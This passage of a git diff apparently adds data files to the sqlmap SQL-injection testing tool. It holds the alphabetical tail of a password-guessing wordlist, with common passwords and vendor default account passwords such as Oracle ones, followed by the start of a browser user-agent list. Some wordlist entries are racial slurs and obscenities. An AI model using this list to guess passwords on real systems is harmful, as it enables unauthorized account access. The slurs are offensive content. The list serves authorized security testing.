+naub3. +naughty +nautica +navajo +navy +navyseal +nazgul +ncc1701 +ncc1701a +ncc1701d +ncc1701e +ncc74656 +ne1410s +ne1469 +ne14a69 +nebraska +needles +negrita +neil +neko +nellie +nelson +nemesis +neng +neon +neotix_sys +nepenthe +neptune +nermal +nesbit +nesbitt +ness +nestle +net +netscape +netware +network +neutrino +nevada +never +nevets +neville +new +newaccount +newark +newbie +newcastl +newcastle +newcourt +newlife +newman +newpass +newpass6 +newport +news +newton +newuser +newyork +newyork1 +next +nextel +nexus6 +nguyen +niang +niao +nicarao +nicasito +nice +niceass +niceguy +nicholas +nichole +nick +nickel +nicklaus +nico +nicola +nicolas +nicole +nicole1 +nigel +nigga +nigger +nigger1 +night +nightmar +nightmare +nights +nightshadow +nightwind +nike +niki +nikita +nikki +nikki1 +nimbus +nimda +nimrod +nina +nine +nineball +nineinch +niners +ning +ninja +ninja1 +ninjas +nintendo +nipper +nipple +nipples +nirvana +nirvana1 +nissan +nisse +nita +nite +nitram +nitro +nittany +nneulpass +nnnnnn +nnnnnnnn +nobody +noelle +nofear +nokia +nolimit +nomad +nomeacuerdo +nomore +noname +none +none1 +nonenone +nong +nonono +noodle +noodles +nookie +nopass +nopassword +norbert +noreen +normal +norman +normandy +norris +north +northern +norton +norway +norwich +nostromo +notebook +notes +nothing +notta1 +notused +nounours +nouveau +nova +novell +november +noviembre +noway +noxious +nuan +nuclear +nude +nudes +nudist +nuevopc +nugget +nuggets +number +number1 +number9 +numbers +nurse +nurses +nutmeg +nutrition +nuts +nutter +nwo4life +nygiants +nyjets +nylons +nymets +nympho +nyquist +oakland +oakley +oas_public +oasis +oatmeal +oaxaca +obelix +oberon +obiwan +oblivion +obsession +obsidian +ocean +oceanography +oceans +ocelot +ocitest +ocm_db_admin +october +octopus +odessa +odm +ods +ods_server +odscommon +odyssey +oe +oem_temp +oemadm +oemrep +office +officer +offshore +ohshit +ohyeah +oicu812 +oilers +okb +okc +oke +oki +oklahoma +oko +okokok +okr +oks +oksana +okx +olapdba +olapsvr +olapsys +older +oldman +olive +oliver +oliver1 +olivetti +olivia +olivier +ollie +olsen +olympus +omega +omega1 +one +onelove +onetime +onetwo +onion +online +onlyme +ont +oo +oooo +ooooo +oooooo +oooooooo +open +opendoor +opennow +openspirit +openup +opera +operator +opi +optimist +optimus +option +options +opus +oracache +oracl3 +oracle +oracle8 +oracle8i +oracle9 +oracle9i +oradbapass +orange +orange1 +oranges +oraprobe +oraregsys +orasso +orasso_ds +orasso_pa +orasso_ps +orasso_public +orastat +orca +orchard +orchid +ordcommon +ordplugins +ordsys +oregon +oreo +orgasm +original +orioles +orion +orion1 +orlando +orville +orwell +oscar +oscar1 +osiris +osm +osp22 +ota +otalab +othello +otis +ottawa +otter +otto +ou812 +ou8122 +ou8123 +outback +outkast +outlaw +outln +outside +over +overkill +overlord +owa +owa_public +owf_mgr +owner +oxford +oxygen +oyster +ozf +ozp +ozs +ozzy +pa +pa55w0rd +pa55word +paagal +pablo +pacers +pacific +pacino +packard +packer +packers +packers1 +packrat +pacman +paco +pad +paddle +padres +page +pain +painless +paint +paintbal +paintball +painter +painting +pajero +pakistan +palace +paladin +palermo +pallmall +palmer +palmtree +paloma +pam +pamela +pana +panama +panasoni +panasonic +pancake +pancho +panda +panda1 +pandas +pandora +pang +panic +pantera +pantera1 +panther +panther1 +panthers +panties +pants +panzer +papa +paper +papers +papillon +papito +paradigm +paradise +paradox +paramedi +paramo +paranoid +paris +paris1 +parisdenoia +park +parker +parol +parola +parrot +partner +party +pasadena +pascal +pasion +pass +pass1 +pass12 +pass123 +pass1234 +passat +passion +passme +passpass +passport +passw0rd +passwd +passwo1 +passwo2 +passwo3 +passwo4 +passwor +password +password! +password. +password1 +password12 +password123 +password2 +password3 +password9 +passwords +passwort +pastor +pasword +pat +patch +patches +patches1 +pathetic +pathfind +patience +patoclero +patrice +patricia +patrick +patrick1 +patriot +patriots +patrol +patton +patty +paul +paula +paulie +paulina +pauline +paulis +pavel +pavement +pavilion +pavlov +payday +payton +peace +peace1 +peach +peaches +peaches1 +peachy +peacock +peanut +peanuts +pearl +pearljam +pearls +pearson +pebble +pebbles +pecker +pedro +pedro1 +peekaboo +peepee +peeper +peewee +pegasus +peggy +pekka +pelican +pelirroja +pencil +pendejo +penelope +penetration +peng +penguin +penguin1 +penguins +penis +penny +penny1 +pentagon +penthous +pentium +people +peoria +pepe +pepito +pepper +pepper1 +peppers +pepsi +pepsi1 +percolate +percy +perfect +perfect1 +performa +perfstat +pericles +perkele +perkins +perlita +perros +perry +persimmon +person +persona +personal +perstat +pervert +petalo +pete +peter +peter1 +peterbil +peterk +peterpan +peters +peterson +petey +petra +petunia +peugeot +peyton +phantom +pharmacy +phat +pheonix +phialpha +phil +philip +philippe +philips +phillies +phillip +phillips +philly +phish +phishy +phoebe +phoenix +phoenix1 +phone +photo +photos +photoshop +phpbb +phyllis +physics +pian +piano +piano1 +pianoman +pianos +piao +piazza +picard +picasso +piccolo +pickle +pickles +picks +pickup +pics +picture +pierce +piercing +pierre +piff +pigeon +piggy +piglet +pigpen +pikachu +pillow +pilot +pimp +pimpdadd +pimpin +pimping +pinball +pineappl +pineapple +pinetree +ping +pingpong +pinhead +pink +pinkfloy +pinkfloyd +pinky +pinky1 +pinnacle +piolin +pioneer +pipeline +piper +piper1 +pippen +pippin +pippo +pirate +pirates +pisces +piscis +pissing +pissoff +pistol +pistons +pit +pitbull +pitch +pixies +pizza +pizza1 +pizzaman +pizzas +pjm +placebo +plane +planes +planet +planning +plasma +plastic +plastics +platinum +plato +platypus +play +playa +playball +playboy +playboy1 +player +players +playing +playmate +playstat +playstation +playtime +please +pleasure +plex +ploppy +plover +plumber +plus +pluto +plymouth +pm +pmi +pn +po +po7 +po8 +poa +pocket +poetic +poetry +point +pointer +poipoi +poison +poiuy +poiuyt +pokemon +poker +poker1 +poland +polar +polaris +pole +police +polina +polish +politics +polly +polo +polopolo +polska +polynomial +pom +pomme +pompey +poncho +pondering +pong +pontiac +pony +poochie +poodle +pooh +poohbear +poohbear1 +pookey +pookie +pookie1 +pool +pool6123 +poonam +poontang +poop +pooper +poopie +poopoo +pooppoop +poopy +pooter +popcorn +pope +popeye +popo +popopo +popper +poppop +poppy +pork +porkchop +porn +pornking +porno +porno1 +pornos +pornporn +porque +porsche +porsche1 +porsche9 +porsche911 +portal30 +portal30_admin +portal30_demo +portal30_ps +portal30_public +portal30_sso +portal30_sso_admin +portal30_sso_ps +portal30_sso_public +portal31 +portal_demo +portal_sso_ps +porter +portland +portugal +pos +poseidon +positive +possum +post +postal +poster +postman +potato +pothead +potter +powder +powell +power +power1 +powercartuser +powers +ppp +pppp +ppppp +pppppp +ppppppp +pppppppp +praise +prayer +preacher +precious +predator +prelude +premier +premium +presario +presiden +president +presley +pressure +presto +preston +pretty +priest +primary +primus +prince +prince1 +princesa +princess +princess1 +princeton +pringles +print +printer +printing +prissy +priv +private +private1 +privs +probes +prodigy +prof +professor +profile +profit +program +progress +project +prometheus +promise +property +prophet +prospect +prosper +protect +protel +proton +protozoa +provider +prowler +proxy +prozac +psa +psalms +psb +psp +psycho +pub +public +pubsub +pubsub1 +puck +puddin +pudding +puffin +puffy +pukayaco14 +pulgas +pulsar +pumper +pumpkin +pumpkin1 +pumpkins +punch +puneet +punisher +punk +punker +punkin +punkrock +puppet +puppies +puppy +puppydog +purdue +purple +purple1 +puss +pussey +pussie +pussies +pussy +pussy1 +pussy123 +pussy69 +pussycat +pussyman +pussys +putter +puzzle +pv +pw123 +pyramid +pyro +python +q1w2e3 +q1w2e3r4 +q1w2e3r4t5 +qa +qawsed +qaz123 +qazqaz +qazwsx +qazwsxed +qazwsxedc +qazxsw +qdba +qiang +qiao +qing +qiong +qosqomanta +qp +qqq111 +qqqq +qqqqq +qqqqqq +qqqqqqq +qqqqqqqq +qs +qs_adm +qs_cb +qs_cbadm +qs_cs +qs_es +qs_os +qs_ws +quality +quan +quantum +quartz +quasar +quattro +quebec +queen +queenie +queens +quentin +querty +quest +question +quincy +qwaszx +qwe123 +qweasd +qweasdzxc +qweewq +qweqwe +qwer +qwer1234 +qwerasdf +qwerqwer +qwert +qwert1 +qwert123 +qwert40 +qwerty +qwerty1 +qwerty12 +qwerty123 +qwerty7 +qwerty80 +qwertyu +qwertyui +qwertyuiop +qwertz +qwewq +qwqwqw +r0ger +r2d2c3po +rabbit +rabbit1 +rabbits +race +racecar +racer +racerx +rachael +rachel +rachel1 +rachelle +rachmaninoff +racing +racoon +radar +radical +radio +radiohea +rafael +rafaeltqm +rafiki +rage +ragnarok +raider +raiders +raiders1 +railroad +rain +rainbow +rainbow1 +rainbow6 +rainbows +raindrop +rainman +rainyday +raistlin +raleigh +rallitas +ralph +ram +rambler +rambo +rambo1 +ramirez +ramona +ramones +rampage +ramrod +ramses +ramsey +ranch +rancid +randall +random +randy +randy1 +rang +ranger +ranger1 +rangers +rangers1 +raphael +raptor +rapture +raquel +rascal +rasdzv3 +rasputin +rasta +rasta1 +rastafarian +ratboy +rated +ratio +ratman +raven +raven1 +ravens +raymond +rayray +razor +razz +re +reader +readers +reading +ready +reagan +real +reality +really +realmadrid +reaper +reason +rebecca +rebecca1 +rebel +rebel1 +rebels +reckless +record +records +recovery +red +red123 +redalert +redbaron +redbird +redbone +redbull +redcar +redcloud +reddevil +reddog +reddwarf +redeye +redfish +redfox +redhat +redhead +redhot +redline +redman +redneck +redred +redrose +redrum +reds +redskin +redskins +redsox +redsox1 +redwing +redwings +redwood +reebok +reed +reefer +referee +reflex +reggae +reggie +regina +reginald +regional +register +reilly +rejoice +reliant +reload +remember +remingto +remote +renault +rene +renee +renegade +reng +rep_owner +repadmin +repair +replicate +report +reports +reptile +republic +republica +requiem +rescue +research +reserve +resident +respect +retard +retire +retired +revenge +review +revolution +revolver +rex +reynolds +reznor +rg +rghy1234 +rhiannon +rhino +rhjrjlbk +rhonda +rhx +ricardo +ricardo1 +rich +richard +richard1 +richards +richie +richmond +rick +ricky +rico +ride +rider +riders +ridge +right +rightnow +riley +rimmer +ring +ringo +ripken +ripley +ripper +ripple +risc +rita +river +rivera +rivers +rje +rla +rlm +rmail +rman +road +roadkill +roadking +roadrunn +roadrunner +roadster +rob +robbie +robby +robert +robert1 +roberta +roberto +roberts +robin +robin1 +robinhood +robins +robinson +robocop +robot +robotech +robotics +robyn +roche +rochelle +rochester +rock +rocker +rocket +rocket1 +rockets +rockford +rockhard +rockie +rockies +rockin +rocknrol +rocknroll +rockon +rocks +rockstar +rockwell +rocky +rocky1 +rodent +rodeo +rodman +rodney +roger +roger1 +rogers +rogue +roland +rolex +roll +roller +rollin +rolling +rollins +rolltide +roman +romance +romano +romans +romantico +romeo +romero +rommel +ronald +ronaldo +rong +roni +ronica +ronnie +roofer +rookie +rooney +rooster +root +root123 +rootbeer +rootroot +rosario +roscoe +rose +rosebud +rosemary +roses +rosie +rosita +ross +rossigno +roswell +rotten +rouge +rough +route66 +rover +rovers +roxanne +roxy +roy +royal +royals +royalty +rrrr +rrrrr +rrrrrr +rrrrrrrr +rrs +ruan +rubber +rubble +ruben +ruby +rudeboy +rudolf +rudy +rufus +rugby +rugby1 +rugger +rules +rumble +runaway +runner +running +rupert +rush +rush2112 +ruslan +russel +russell +russia +russian +rusty +rusty1 +rusty2 +ruth +ruthie +ruthless +ryan +sabbath +sabina +sabine +sabres +sabrina +sabrina1 +sadie +sadie1 +safari +safety +safety1 +sahara +saigon +sailboat +sailing +sailor +saint +saints +sairam +saiyan +sakura +sal +salami +salasana +saleen +salem +sales +sally +sally1 +salmon +salomon +salope +salou25 +salut +salvador +salvation +sam +sam123 +samIam +samantha +sambo +samiam +samm +sammie +sammy +sammy1 +samoht +sample +sampleatm +sampson +samsam +samson +samsung +samsung1 +samuel +samuel22 +samurai +sanchez +sancho +sand +sander +sanders +sandi +sandie +sandiego +sandman +sandra +sandrine +sandro +sandwich +sandy +sandy1 +sanford +sanfran +sang +sanity +sanjose +santa +santafe +santana +santiago +santos +sap +saphire +sapper +sapphire +sapr3 +sara +sarah +sarah1 +saratoga +sarita +sasasa +sascha +sasha +sasha1 +saskia +sassy +sassy1 +satan +satan666 +satori +saturday +saturn +saturn5 +sauron +sausage +sausages +savage +savanna +savannah +savior +sawyer +saxon +sayang +sbdc +scamper +scania +scanner +scarecrow +scarface +scarlet +scarlett +schalke +schatz +scheisse +scheme +schmidt +schnapps +school +science +scissors +scooby +scooby1 +scoobydo +scoobydoo +scooter +scooter1 +score +scorpio +scorpio1 +scorpion +scotch +scotland +scott +scott1 +scottie +scotty +scout +scouts +scrabble +scrapper +scrappy +scratch +scream +screamer +screen +screw +screwy +script +scrooge +scruffy +scuba +scuba1 +scully +sdos_icsap +seabee +seadoo +seagate +seagull +seahawks +seamus +sean +searay +search +season +seattle +sebastia +sebastian +sebring +secdemo +second +secret +secret1 +secret3 +secrets +secure +security +sedona +seeker +seeking +seinfeld +select +selena +selina +seminole +semper +semperfi +senator +senators +seneca +seng +senha +senior +senna +sensei +sensor +sentinel +seoul +septembe +september +septiembre +serega +serena +serenity +sergeant +sergei +sergey +sergio +series +serpent +servando +server +service +serviceconsumer1 +services +sesame +sestosant +seven +seven7 +sevens +sex +sex123 +sex4me +sex69 +sexgod +sexman +sexo +sexsex +sexsexsex +sexual +sexx +sexxx +sexxxx +sexxxy +sexxy +sexy +sexy1 +sexy69 +sexybabe +sexyboy +sexygirl +sexylady +sexyman +sexysexy +seymour +sf49ers +sh +shadow +shadow1 +shadow12 +shadows +shag +shaggy +shai +shakira +shalom +shaman +shampoo +shamrock +shamus +shan +shane +shang +shanghai +shania +shanna +shannon +shannon1 +shanny +shanti +shao +shaolin +sharc +share +shark +sharks +sharky +sharon +sharp +shasta +shauna +shaved +shawn +shawna +shayne +shazam +shearer +sheba +sheba1 +sheeba +sheena +sheep +sheepdog +sheffield +shei +sheila +shelby +sheldon +shell +shelley +shelly +shelter +shelves +shemale +shen +sheng +shepherd +sheridan +sheriff +sherlock +sherman +sherri +sherry +sherwood +shibby +shiloh +shiner +shinobi +ship +shirley +shit +shitface +shithead +shitty +shiva +shivers +shock +shocker +shodan +shoes +shogun +shojou +shonuf +shooter +shopper +shopping +short +shorty +shorty1 +shotgun +shou +shovel +show +shower +showme +showtime +shrimp +shuai +shuang +shui +shun +shuo +shuttle +shutup +shyshy +si_informtn_schema +sick +sidekick +sidney +siemens +sierra +sigma +sigmachi +signal +signature +silence +silent +silly +silver +silver1 +silverad +silvia +simba +simba1 +simmons +simon +simon1 +simona +simone +simple +simpson +simpsons +sims +simsim +sinatra +sinbad +sinclair +sinegra +singapor +singer +single +sinister +sinned +sinner +siobhan +sirius +sissy +sister +sister12 +sisters +site +siteminder +sites +sithlord +sixers +sixpack +sixsix +sixty +sixty9 +skate +skater +skeeter +skibum +skidoo +skiing +skillet +skinhead +skinner +skinny +skip +skipper +skipper1 +skippy +skittles +skull +skunk +skydive +skyhawk +skylar +skylark +skyler +skyline +skywalke +skywalker +slacker +slamdunk +slammer +slapper +slappy +slapshot +slater +slave +slave1 +slayer +slayer1 +sleep +sleeper +sleepy +slick +slick1 +slidepw +slider +slim +slimshad +slinky +slip +slipknot +slipknot666 +slippery +sloppy +slowhand +slugger +sluggo +slut +sluts +slutty +smackdow +small +smart +smart1 +smashing +smeghead +smegma +smelly +smile +smile1 +smiles +smiley +smirnoff +smith +smiths +smitty +smoke +smoke1 +smoker +smokes +smokey +smokey1 +smokie +smokin +smoking +smooch +smooth +smoothie +smother +smudge +smurfy +smut +snake +snake1 +snakes +snapon +snapper +snapple +snappy +snatch +sneakers +sneaky +snicker +snickers +sniffing +sniper +snooker +snoop +snoopdog +snoopy +snoopy1 +snow +snowball +snowbird +snowboar +snowboard +snowfall +snowflak +snowflake +snowman +snowski +snuffy +snuggles +soap +sober1 +soccer +soccer1 +soccer10 +soccer12 +soccer2 +socrates +softail +softball +software +solaris +soldier +soledad +soleil +solitude +solo +solomon +solution +some +somebody +someday +someone +somerset +somethin +something +sommer +sonata +sondra +song +sonia +sonic +sonics +sonny +sonoma +sonrisa +sony +sonya +sonyfuck +sonysony +sooner +sooners +sophia +sophie +soprano +sossina +soto +soul +soulmate +sound +south +southern +southpar +southpark +southpaw +sowhat +soyhermosa +space +spaceman +spain +spam +spanish +spank +spanker +spanking +spankme +spanky +spanner +sparkle +sparkles +sparks +sparky +sparky1 +sparrow +sparrows +sparta +spartan +spartan1 +spartans +spawn +spazz +speaker +speakers +spears +special +specialk +spectre +spectrum +speed +speedo +speedway +speedy +spence +spencer +spencer1 +sperma +sphinx +sphynx +spice +spider +spider1 +spiderma +spiderman +spidey +spierson +spike +spike1 +spiker +spikes +spikey +spinner +spiral +spirit +spit +spitfire +splash +spliff +splinter +spock +spoiled +sponge +spongebo +spooge +spooky +spoon +spoons +sport +sporting +sports +sporty +spot +spotty +spread +spring +springer +springs +sprint +sprinter +sprite +sprocket +sprout +spud +spunky +spurs +spurs1 +sputnik +spyder +sql +sqlexec +squall +square +squash +squeak +squeeze +squires +squirrel +squirt +srinivas +ssp +sss +ssss +sssss +ssssss +sssssss +ssssssss +stacey +staci +stacie +stacy +stafford +stalin +stalker +stallion +stan +standard +stanford +stang +stanley +staples +star +star69 +starbuck +starcraf +starcraft +stardust +starfire +starfish +stargate +starligh +starlight +starman +starr +stars +starship +starstar +start +start1 +starter +startrek +starwars +state +static +station +status +stayout +stealth +steel +steele +steeler +steelers +stefan +stefanie +stefano +steffen +steffi +stella +stellar +steph +steph1 +stephan +stephane +stephani +stephanie +stephen +stephen1 +stephi +stereo +sterling +steve +steve1 +steven +steven1 +stevens +stevie +stewart +stick +stickman +sticks +sticky +stiffy +stimpy +sting +sting1 +stinger +stingray +stinker +stinky +stivers +stock +stocking +stocks +stockton +stolen +stone +stone1 +stonecol +stonecold +stoned +stoner +stones +stoney +stop +storage +store +stories +storm +storm1 +stormy +straight +strange +stranger +strangle +strap +strat +strat_passwd +stratford +strato +stratus +strawber +strawberry +stream +streaming +street +streets +strength +stress +stretch +strider +strike +striker +string +strip +stripper +stroke +stroker +strong +stryker +stuart +stubby +stud +student +student2 +studio +studly +studman +stuff +stumpy +stunner +stupid +stupid1 +stuttgart +style +styles +stylus +suan +subaru +sublime +submit +suburban +subway +subzero +success +success1 +suck +suckdick +sucked +sucker +suckers +sucking +suckit +suckme +sucks +sudoku +sue +sugar +sugar1 +suicide +sullivan +sultan +summer +summer1 +summer69 +summer99 +summers +summit +sumuinen +sun +sunbird +sundance +sunday +sundevil +sunfire +sunflowe +sunflower +sunlight +sunny +sunny1 +sunnyday +sunrise +sunset +sunshine +super +super1 +superb +superfly +superior +superman +superman1 +supernov +supersecret +supersta +superstage +superstar +superuser +supervisor +support +supported +supra +supreme +surf +surfer +surfing +survivor +susan +susan1 +susana +susanna +susanne +sushi +susie +sutton +suzanne +suzie +suzuki +suzy +svetlana +swallow +swanson +swearer +sweden +swedish +sweet +sweet1 +sweetheart +sweetie +sweetnes +sweetness +sweetpea +sweets +sweety +swim +swimmer +swimming +swinger +swingers +swinging +switch +switzer +swoosh +sword +swordfis +swordfish +swords +swpro +swuser +sybil +sydney +sylveste +sylvester +sylvia +sylvie +symbol +symmetry +sympa +synergy +syracuse +sys +sys_stnt +sysadm +sysadmin +sysman +syspass +system +system5 +systempass +systems +syzygy +t-bone +tab +tabasco +tabatha +tabitha +taco +tacobell +tacoma +taffy +tahiti +taiwan +talbot +talisman +talks +talon +tamara +tami +tamie +tammy +tamtam +tang +tangerine +tango +tank +tanker +tanner +tantra +tanya +tanya1 +tapani +tape +tara +tardis +targas +target +tarheel +tarheels +tarpon +tarragon +tartar +tarzan +tasha +tasha1 +tata +tatiana +tattoo +taurus +taxman +taylor +taylor1 +tazdevil +tazman +tazmania +tbird +tbone +tdos_icsap +teacher +team +tech +technics +techno +tectec +teddy +teddy1 +teddybea +teddybear +teen +teenage +teens +teflon +tekila +tekken +telecom +telefon +telefono +telephon +telephone +temp +temp! +temp123 +tempest +templar +temple +temporal +temporary +temppass +temptation +temptemp +tenchi +tender +tenerife +teng +tennesse +tennis +tequiero +tequila +terefon +teresa +terminal +terminat +terminator +terra +terrapin +terrell +terror +terry +terry1 +test +test! +test1 +test12 +test123 +test1234 +test2 +test3 +test_user +tester +testi +testing +testing1 +testpass +testpilot +testtest +tetsuo +texas +texas1 +thailand +thanatos +thanks +thankyou +the +theater +theatre +thebear +thebest +theboss +thecat +thecrow +thecure +thedog +thedon +thedoors +thedude +theend +theforce +thegame +thegreat +their +thejudge +thekid +theking +thelma +thelorax +theman +theodore +theone +there +theresa +therock +therock1 +these +thesims +thethe +thewho +thierry +thing +thinsamplepw +thirteen +this +thisisit +thomas +thomas1 +thompson +thong +thongs +thor +thorne +thrasher +three +threesom +throat +thuglife +thumb +thumbs +thumper +thunder +thunder1 +thunderb +thunderbird +thursday +thx1138 +tian +tiao +tibco +tiberius +tiburon +ticket +tickle +tierno +tiffany +tiffany1 +tiger +tiger1 +tiger123 +tiger2 +tigercat +tigers +tigers1 +tigger +tigger1 +tigger2 +tight +tightend +tights +tigre +tika +tim +timber +time +timeout +timmy +timosha +timosha123 +timothy +timtim +tina +ting +tinker +tinkerbe +tinkerbell +tinman +tintin +tiny +tip37 +tipper +titan +titanic +titanium +titans +titimaman +titleist +titouf59 +tits +titten +titts +titty +tivoli +tnt +toast +toaster +tobias +toby +today +todd +toejam +toffee +together +toggle +toilet +tokyo +toledo +tolkien +tom +tomahawk +tomas +tomato +tomcat +tommie +tommy +tommy1 +tommyboy +tomorrow +tomtom +tong +tongue +tonight +tony +toocool +tool +toolbox +toolman +toon +toonarmy +tootie +tootsie +topcat +topdog +topgun +tophat +topher +topography +topper +toriamos +torino +tornado +toronto +torpedo +torres +tortoise +toshiba +tosser +total +toto +toto1 +tototo +tottenha +tottenham +toucan +touching +tower +towers +town +toxic +toyota +trace +tracer +tracey +traci +tracie +track +tracker +tractor +tracy +trader +traffic +trailer +trails +train +trainer +training +trains +trance +tranny +trans +transam +transfer +transit +transport +trapper +trash +trauma +travel +traveler +travis +tre +treasure +treble +trebor +tree +treefrog +trees +treetop +trek +trevor +trial +triangle +tribal +tricia +tricky +trident +trigger +trinidad +trinitro +trinity +trip +triple +tripleh +tripod +tripper +trish +trisha +tristan +triton +triumph +trivial +trixie +trojan +trojans +troll +trombone +trooper +trophy +tropical +trouble +trouble1 +trout +troy +truck +trucker +trucking +trucks +truelove +truman +trumpet +trunks +trust +trustme +trustno1 +truth +tsdev +tsunami +tsuser +tttttt +tttttttt +tty +tuan +tubas +tucker +tucson +tuesday +tula +tulips +tuna +tunafish +tundra +tupac +turbine +turbo +turbo1 +turbo2 +turkey +turner +turnip +turtle +tuscl +tuttle +tweety +tweety1 +twelve +twenty +twiggy +twilight +twinkie +twinkle +twins +twisted +twister +twitter +tybnoq +tycoon +tyler +tyler1 +typhoon +tyrone +tyson +tyson1 +ultima +ultimate +ultra +um_admin +um_client +umbrella +umesh +umpire +undead +underdog +undertak +undertaker +underworld +unhappy +unicorn +unicornio +unique +united +unity +universa +universal +universe +universidad +university +unix +unknown +unreal +upsilon +uptown +upyours +uranus +urchin +ursula +usa123 +usarmy +user +user0 +user1 +user2 +user3 +user4 +user5 +user6 +user7 +user8 +user9 +username +usmarine +usmc +usnavy +util +utility +utlestat +utopia +uucp +uuuuuu +vacation +vader +vader1 +vagabond +vagina +val +valencia +valentin +valentina +valentinchoque +valentine +valeria +valerie +valeverga +valhalla +valkyrie +valley +vampire +vampires +vancouve +vanessa +vanessa1 +vanguard +vanhalen +vanilla +vasant +vauxhall +vea +vector +vectra +vedder +vegas +vegeta +vegitto +veh +velo +velocity +velvet +venice +venom +ventura +venture +venus +veracruz +verbatim +veritas +verizon +vermont +vernon +verona +veronica +veronika +versace +vertex_login +vertigo +vette +vfhbyf +vfrcbv +vh5150 +viagra +vicki +vickie +vicky +victor +victor1 +victoria +victory +video +videouser +vienna +vietnam +viewsoni +vif_dev_pwd +viking +vikings +vikings1 +vikram +villa +village +vincent +vincent1 +vinnie +vintage +violet +violin +viper +viper1 +vipergts +vipers +virago +virgil +virgin +virginia +virginie +virtual +virus +viruser +visa +vision +visitor +visual +vivian +vladimir +vodka +volcano +volcom +volkswag +volley +volleyba +volume +volvo +voodoo +vortex +voyager +voyager1 +voyeur +vrr1 +vrr2 +vsegda +vulcan +vvvv +vvvvvv +waffle +wagner +waiting +walden +waldo +walker +wallace +wallet +walleye +wally +walmart +walnut +walrus +walter +walton +wanderer +wang +wanker +wanking +wanted +warcraft +wareagle +warez +wargames +warhamme +warlock +warlord +warner +warning +warren +warrior +warrior1 +warriors +warthog +wasabi +washburn +washingt +washington +wasser +wassup +wasted +watch +watcher +water +water1 +waterboy +waterloo +waters +watford +watson +wayne +wayne1 +wealth +wearing +weasel +weather +weaver +web +webber +webcal01 +webdb +webmaste +webmaster +webread +webster +wedding +wedge +weed +weed420 +weekend +weenie +weezer +weiner +weird +welcome +welcome1 +welcome123 +welder +wendi +wendy +wendy1 +weng +werder +werdna +werewolf +werner +wert +wesley +west +western +westham +weston +westside +westwood +wetpussy +wetter +wfadmin +wg8e3wjf +wh +whale1 +what +whatever +whatnot +whatsup +whatthe +whatwhat +wheels +whiplash +whiskers +whiskey +whisky +whisper +whistler +whit +white +white1 +whiteboy +whiteout +whitesox +whitey +whiting +whitney +whocares +wholesale +whore +whoville +whynot +wibble +wicked +widget +wiesenhof +wifey +wilbur +wild +wildbill +wildcard +wildcat +wildcats +wilder +wildfire +wildman +wildone +wildwood +will +william +william1 +williams +williamsburg +willie +willis +willow +willy +wilma +wilson +win95 +wind +windmill +window +windows +windsor +windsurf +winger +wingman +wingnut +wings +winner +winner1 +winners +winnie +winniethepooh +winona +winston +winston1 +winter +winter1 +wip +wireless +wisconsin +wisdom +wiseguy +wishbone +wives +wizard +wizard1 +wizards +wk_test +wkadmin +wkproxy +wksys +wkuser +wms +wmsys +wob +wolf +wolf1 +wolf359 +wolfen +wolfgang +wolfie +wolfman +wolfpac +wolfpack +wolverin +wolverine +wolves +woman +wombat +wombat1 +women +wonder +wonderboy +wood +woodie +woodland +woodstoc +woodwind +woody +woody1 +woofer +woofwoof +woohoo +wookie +woowoo +word +wordpass +wordup +work +work123 +working +workout +world +wormwood +worship +worthy +wowwow +wps +wraith +wrangler +wrench +wrestle +wrestler +wrestlin +wrestling +wright +wrinkle1 +writer +writing +wsh +wsm +wutang +www +wwwuser +wwww +wwwwww +wwwwwww +wwwwwwww +wxcvbn +wyoming +x-files +x-men +xademo +xanadu +xander +xanth +xavier +xcountry +xdp +xerxes +xfer +xfiles +xian +xiang +xiao +ximena +ximenita +xing +xiong +xla +xmodem +xnc +xni +xnm +xnp +xns +xprt +xtr +xtreme +xuan +xxx +xxx123 +xxxx +xxxxx +xxxxxx +xxxxxxx +xxxxxxxx +xyz +xyz123 +xyzzy +y +yaco +yamaha +yamahar1 +yamato +yang +yankee +yankees +yankees1 +yankees2 +yasmin +yaya +yeah +yeahbaby +yellow +yellowstone +yes +yeshua +yessir +yesyes +yfnfif +ying +yoda +yogibear +yolanda +yomama +yong +yosemite +yoteamo +young +young1 +your_pass +yourmom +yousuck +yoyo +yoyoma +yoyoyo +ysrmma +ytrewq +yuan +yukon +yummy +yumyum +yvette +yvonne +yyyy +yyyyyy +yyyyyyyy +yzerman +zachary +zachary1 +zack +zander +zang +zanzibar +zap +zapata +zapato +zaphod +zappa +zapper +zaq123 +zaq12wsx +zaq1xsw2 +zaqwsx +zaqxsw +zebra +zebras +zeng +zenith +zephyr +zeppelin +zepplin +zero +zerocool +zeus +zhai +zhang +zhao +zhei +zheng +zhong +zhongguo +zhou +zhuai +zhuang +zhui +zhun +zhuo +zidane +ziggy +zigzag +zildjian +zimmerman +zipper +zippo +zippy +zirtaeb +zmodem +zodiac +zoltan +zombie +zong +zoomer +zorro +zouzou +zuan +zwerg +zxc +zxc123 +zxccxz +zxcv +zxcvb +zxcvbn +zxcvbnm +zxcvbnm1 +zxcxz +zxczxc +zxzxzx +zzz +zzzxxx +zzzz +zzzzz +zzzzzz +zzzzzzz +zzzzzzzz diff --git a/src/sqlmap-master/data/txt/user-agents.txt b/src/sqlmap-master/data/txt/user-agents.txt new file mode 100644 index 0000000..a92582d --- /dev/null +++ b/src/sqlmap-master/data/txt/user-agents.txt @@ -0,0 +1,4274 @@ +# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +# Opera + +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.02 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.02 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.52 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.54 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; pl) Opera 8.54 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; da) Opera 8.54 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.0 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.01 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.02 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.52 +Mozilla/4.0 (compatible; MSIE 6.0; 